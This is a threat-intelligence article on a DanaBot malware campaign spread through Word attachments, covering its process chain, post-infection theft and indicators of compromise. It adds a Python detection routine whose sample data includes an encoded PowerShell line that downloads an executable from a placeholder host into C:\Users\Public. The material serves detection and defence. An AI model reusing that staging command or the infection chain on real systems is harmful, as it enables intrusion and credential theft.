Recent email campaigns distribute DanaBot malware through two document types: those exploiting the equation editor and those containing external links. Attackers send emails disguised as job applications with a malicious Word document attached. The document itself does not contain malware; it tricks the user into clicking an external link, which starts the DanaBot infection process.
DanaBot Malware
The Endpoint Detection and Response (EDR) system flagged a suspicious process chain initiated when a user clicked on a malicious email attachment.
The attachment, a Word document (.docx), triggered a sequence involving Outlook (outlook.exe), Word (winword.exe), Command Prompt (cmd.exe), PowerShell (powershell.exe), and a potentially malicious executable (iu4t4.exe), which in turn launched rundll32.exe.
The malicious macro template (w1p4nx.dotm) carries encoded CMD commands that the macro code decodes and executes, including a PowerShell script that downloads the DanaBot executable (iu4t4.exe) from a command-and-control (C2) server.
The EDR record confirms the decoded commands and the creation of the DanaBot executable in the C:\Users\Public directory by PowerShell.
ASEC’s analysis of the EDR process diagrams uncovers DanaBot’s (iu4t4.exe) self-injection technique, in which it uses rundll32.exe to run shell32.dll functionality. Operating under this disguise lets DanaBot bypass detection and establish persistence.
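Detection logic for the process chain described above, written over constructed EDR-style events; this is an added example, not ASEC’s code or anything from the original article. The image paths, the host c2.invalid, the encoded PowerShell command and the rundll32 arguments are constructed placeholders, and the detection keys on the chain’s structure (Word ancestor, encoded PowerShell staging into C:\Users\Public, rundll32 launched from that directory) rather than on any file name.

```python
import base64
from typing import Dict, List, NamedTuple, Optional
# Minimal EDR-style process record: pid, parent pid, full image path, command line.
Proc = NamedTuple("Proc", [("pid", int), ("ppid", int), ("image", str), ("cmdline", str)])
# Constructed PowerShell stage as -EncodedCommand (base64 of UTF-16LE); c2.invalid is a placeholder.
SAMPLE_PS = r"Invoke-WebRequest -Uri http://c2.invalid/iu4t4.exe -OutFile C:\Users\Public\iu4t4.exe"
SAMPLE_ENC = base64.b64encode(SAMPLE_PS.encode("utf-16le")).decode()
# Constructed events mirroring the chain in the article (not real telemetry).
SAMPLE_EVENTS = [
    Proc(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "outlook.exe"),
    Proc(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "winword.exe /n application.docx"),
    Proc(300, 200, r"C:\Windows\System32\cmd.exe", f"cmd.exe /c powershell.exe -w hidden -EncodedCommand {SAMPLE_ENC}"),
    Proc(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", f"powershell.exe -w hidden -EncodedCommand {SAMPLE_ENC}"),
    Proc(500, 400, r"C:\Users\Public\iu4t4.exe", "iu4t4.exe"),
    Proc(600, 500, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]
def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text); None if absent or invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec", "-e"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None
def _name(p: Proc) -> str:
    return p.image.rsplit("\\", 1)[-1].lower()
def ancestors(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Image names of the parent chain, nearest parent first."""
    chain, p = [], procs.get(pid)
    while p is not None and p.ppid in procs:
        p = procs[p.ppid]
        chain.append(_name(p))
    return chain

def detect_danabot_chain(events: List[Proc]) -> List[str]:
    """Flag encoded PowerShell under Word that stages into C:\\Users\\Public, and rundll32 launched from there."""
    procs, findings = {e.pid: e for e in events}, []
    for p in events:
        parents, parent = ancestors(procs, p.pid), procs.get(p.ppid)
        if _name(p) == "powershell.exe" and "winword.exe" in parents:
            decoded = (decode_encoded_command(p.cmdline) or "").lower()
            if "c:\\users\\public" in decoded:
                findings.append(f"pid {p.pid}: encoded PowerShell under Word writes to C:\\Users\\Public")
        if _name(p) == "rundll32.exe" and parent and parent.image.lower().startswith("c:\\users\\public\\"):
            findings.append(f"pid {p.pid}: rundll32.exe spawned by {parent.image} (possible self-injection)")
    return findings
```

Running `detect_danabot_chain(SAMPLE_EVENTS)` yields two findings, one for the PowerShell stage (pid 400) and one for rundll32.exe started from C:\Users\Public (pid 600); a PowerShell launched from explorer.exe with a plain command line produces none.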
EDR data highlights the malware’s post-infection activities, including screenshot capture, sensitive information theft, and stealing browser credentials, which enable system compromise without constant communication with the command-and-control server. An incident involving a potential malware infection was detected, with observed scripting and malware execution attempts (M10747, M10459). The downloaded files (DOCX, DOTM) were flagged as suspicious (Downloader/XML.External, Downloader/DOC.Generic.S2503).
Further analysis uncovered a Trojan (Trojan/Win.DANABOT.C5608053) along with associated IOCs (0bb0ae135c2f4ec39e93dcf66027604d.DOCX, 28fd189dc70f5bab649e8a267407ae85.DOTM, e29e4a6c31bd79d90ab2b89f57075312.exe).